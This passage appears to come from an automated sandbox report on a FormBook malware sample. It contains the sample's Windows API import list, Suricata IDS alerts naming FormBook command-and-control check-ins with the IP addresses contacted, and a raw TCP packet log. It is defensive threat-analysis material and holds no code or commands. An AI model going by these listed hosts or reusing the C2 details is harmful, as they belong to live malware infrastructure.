GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T05:23:48.414122+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49739	80	192.168.2.4	217.160.0.106
2024-08-29T05:24:43.163075+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49748	80	192.168.2.4	43.252.167.188
2024-08-29T05:24:38.121245+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49746	80	192.168.2.4	43.252.167.188
2024-08-29T05:25:44.679241+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49760	80	192.168.2.4	199.192.19.19
2024-08-29T05:24:22.138364+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49745	80	192.168.2.4	208.91.197.27
2024-08-29T05:26:09.127708+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49767	80	192.168.2.4	91.195.240.19
2024-08-29T05:24:40.613238+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49747	80	192.168.2.4	43.252.167.188
2024-08-29T05:25:08.595090+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49755	80	192.168.2.4	23.251.54.212
2024-08-29T05:25:42.092821+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49759	80	192.168.2.4	199.192.19.19
2024-08-29T05:23:43.265145+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49737	80	192.168.2.4	217.160.0.106
2024-08-29T05:26:06.576245+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49766	80	192.168.2.4	91.195.240.19
2024-08-29T05:26:00.793267+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49765	80	192.168.2.4	213.145.228.16
2024-08-29T05:26:33.892219+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49772	80	192.168.2.4	172.67.210.102
2024-08-29T05:26:31.345353+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49771	80	192.168.2.4	172.67.210.102
2024-08-29T05:25:06.049149+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49754	80	192.168.2.4	23.251.54.212
2024-08-29T05:26:11.764888+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49768	80	192.168.2.4	91.195.240.19
2024-08-29T05:25:33.878707+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49757	80	192.168.2.4	23.251.54.212
2024-08-29T05:25:53.110937+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49762	80	192.168.2.4	213.145.228.16
2024-08-29T05:24:59.075679+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49753	80	192.168.2.4	194.9.94.85
2024-08-29T05:22:50.860360+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49773	80	192.168.2.4	172.67.210.102
2024-08-29T05:24:12.959498+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49742	80	192.168.2.4	208.91.197.27
2024-08-29T05:25:58.225015+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49764	80	192.168.2.4	213.145.228.16
2024-08-29T05:24:54.012938+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49751	80	192.168.2.4	194.9.94.85
2024-08-29T05:25:47.174973+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49761	80	192.168.2.4	199.192.19.19
2024-08-29T05:25:11.485739+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49756	80	192.168.2.4	23.251.54.212
2024-08-29T05:25:55.627828+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49763	80	192.168.2.4	213.145.228.16
2024-08-29T05:24:51.454905+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49750	80	192.168.2.4	194.9.94.85
2024-08-29T05:23:51.070221+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49740	80	192.168.2.4	217.160.0.106
2024-08-29T05:24:45.696562+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49749	80	192.168.2.4	43.252.167.188
2024-08-29T05:23:45.840976+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49738	80	192.168.2.4	217.160.0.106
2024-08-29T05:26:28.818630+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49770	80	192.168.2.4	172.67.210.102
2024-08-29T05:23:27.422081+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49736	80	192.168.2.4	5.44.111.162
2024-08-29T05:24:56.557993+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49752	80	192.168.2.4	194.9.94.85
2024-08-29T05:24:18.037065+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49744	80	192.168.2.4	208.91.197.27
2024-08-29T05:26:14.213515+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49769	80	192.168.2.4	91.195.240.19
2024-08-29T05:25:39.547107+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49758	80	192.168.2.4	199.192.19.19
2024-08-29T05:24:15.496052+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49743	80	192.168.2.4	208.91.197.27

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 05:23:26.747751951 CEST	49736	80	192.168.2.4	5.44.111.162
Aug 29, 2024 05:23:26.752531052 CEST	80	49736	5.44.111.162	192.168.2.4
Aug 29, 2024 05:23:26.752621889 CEST	49736	80	192.168.2.4	5.44.111.162
Aug 29, 2024 05:23:26.754905939 CEST	49736	80	192.168.2.4	5.44.111.162
Aug 29, 2024 05:23:26.759761095 CEST	80	49736	5.44.111.162	192.168.2.4
Aug 29, 2024 05:23:27.421891928 CEST	80	49736	5.44.111.162	192.168.2.4
Aug 29, 2024 05:23:27.421935081 CEST	80	49736	5.44.111.162	192.168.2.4
Aug 29, 2024 05:23:27.422080994 CEST	49736	80	192.168.2.4	5.44.111.162
Aug 29, 2024 05:23:27.435122013 CEST	49736	80	192.168.2.4	5.44.111.162
Aug 29, 2024 05:23:27.440474987 CEST	80	49736	5.44.111.162	192.168.2.4
Aug 29, 2024 05:23:42.618594885 CEST	49737	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:42.623444080 CEST	80	49737	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:42.623557091 CEST	49737	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:42.625318050 CEST	49737	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:42.630362988 CEST	80	49737	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:43.264993906 CEST	80	49737	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:43.265089035 CEST	80	49737	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:43.265145063 CEST	49737	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:44.141863108 CEST	49737	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:45.189121962 CEST	49738	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:45.194648981 CEST	80	49738	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:45.194762945 CEST	49738	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:45.232196093 CEST	49738	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:45.239906073 CEST	80	49738	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:45.840840101 CEST	80	49738	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:45.840878010 CEST	80	49738	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:45.840976000 CEST	49738	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:46.735646963 CEST	49738	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:47.753890991 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:47.761141062 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.761223078 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:47.763310909 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:47.770881891 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.770894051 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.770904064 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.770914078 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.770927906 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.771974087 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.771984100 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.771996975 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:47.772006989 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:48.414019108 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:48.414038897 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:48.414122105 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:49.267009974 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:50.285125017 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:50.429796934 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:50.430088043 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:50.436369896 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:50.442338943 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:51.070024967 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:51.070069075 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 29, 2024 05:23:51.070220947 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:51.105099916 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 29, 2024 05:23:51.109896898 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 29, 2024 05:24:12.503005028 CEST	49742	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:12.507843018 CEST	80	49742	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:12.508016109 CEST	49742	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:12.509845018 CEST	49742	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:12.514590979 CEST	80	49742	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:12.959414005 CEST	80	49742	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:12.959497929 CEST	49742	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:14.017160892 CEST	49742	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:14.022054911 CEST	80	49742	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:15.035336971 CEST	49743	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:15.040215015 CEST	80	49743	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:15.040307999 CEST	49743	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:15.042155027 CEST	49743	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:15.046996117 CEST	80	49743	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:15.495985031 CEST	80	49743	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:15.496052027 CEST	49743	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:16.548151970 CEST	49743	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:16.552969933 CEST	80	49743	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.569273949 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:17.574256897 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.574352026 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:17.576500893 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:17.585886955 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.585897923 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586554050 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586657047 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586667061 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586699009 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586707115 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586777925 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:17.586853981 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:18.036658049 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:18.037065029 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:19.079365015 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:19.084240913 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:20.203324080 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:20.208214045 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:20.208297014 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:20.212661982 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:20.217437029 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138124943 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138142109 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138159037 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138169050 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138180017 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.138364077 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.145715952 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.145762920 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.145775080 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.145790100 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.145798922 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.145821095 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.145945072 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.145991087 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.146027088 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.151021004 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.151070118 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.151081085 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.151102066 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.151103973 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.151124001 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.205037117 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.225420952 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.225435019 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.225446939 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.225456953 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:22.225519896 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.225595951 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.229032993 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 29, 2024 05:24:22.234565973 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 29, 2024 05:24:37.220597982 CEST	49746	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:37.225569963 CEST	80	49746	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:37.225636005 CEST	49746	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:37.227816105 CEST	49746	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:37.232636929 CEST	80	49746	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:38.120994091 CEST	80	49746	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:38.121069908 CEST	80	49746	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:38.121083975 CEST	80	49746	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:38.121244907 CEST	49746	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:38.735667944 CEST	49746	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:39.754900932 CEST	49747	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:39.759772062 CEST	80	49747	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:39.759876966 CEST	49747	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:39.761919975 CEST	49747	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:39.766679049 CEST	80	49747	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:40.612752914 CEST	80	49747	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:40.613177061 CEST	80	49747	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:40.613238096 CEST	49747	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:41.270299911 CEST	49747	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:42.285413980 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:42.290271044 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.290402889 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:42.292506933 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:42.297301054 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297332048 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297342062 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297352076 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297451973 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297506094 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297522068 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297537088 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:42.297545910 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:43.162997007 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:43.163031101 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:43.163074970 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:43.798211098 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:44.817090034 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:44.821991920 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:44.822130919 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:44.825088024 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:44.829940081 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:45.696408033 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:45.696429014 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:45.696562052 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:45.699165106 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 29, 2024 05:24:45.703932047 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 29, 2024 05:24:50.808428049 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:50.813237906 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:50.817199945 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:50.821105957 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:50.825922966 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454845905 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454865932 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454879045 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454890013 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454905033 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:51.454912901 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454926014 CEST	80	49750	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:51.454931974 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:51.455007076 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:52.329444885 CEST	49750	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:53.349198103 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:53.354145050 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:53.354217052 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:53.356384993 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:53.361176014 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012830019 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012865067 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012877941 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012890100 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012902021 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012912989 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012923956 CEST	80	49751	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:54.012938023 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:54.015248060 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:54.860685110 CEST	49751	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:55.879154921 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:55.884076118 CEST	80	49752	194.9.94.85	192.168.2.4
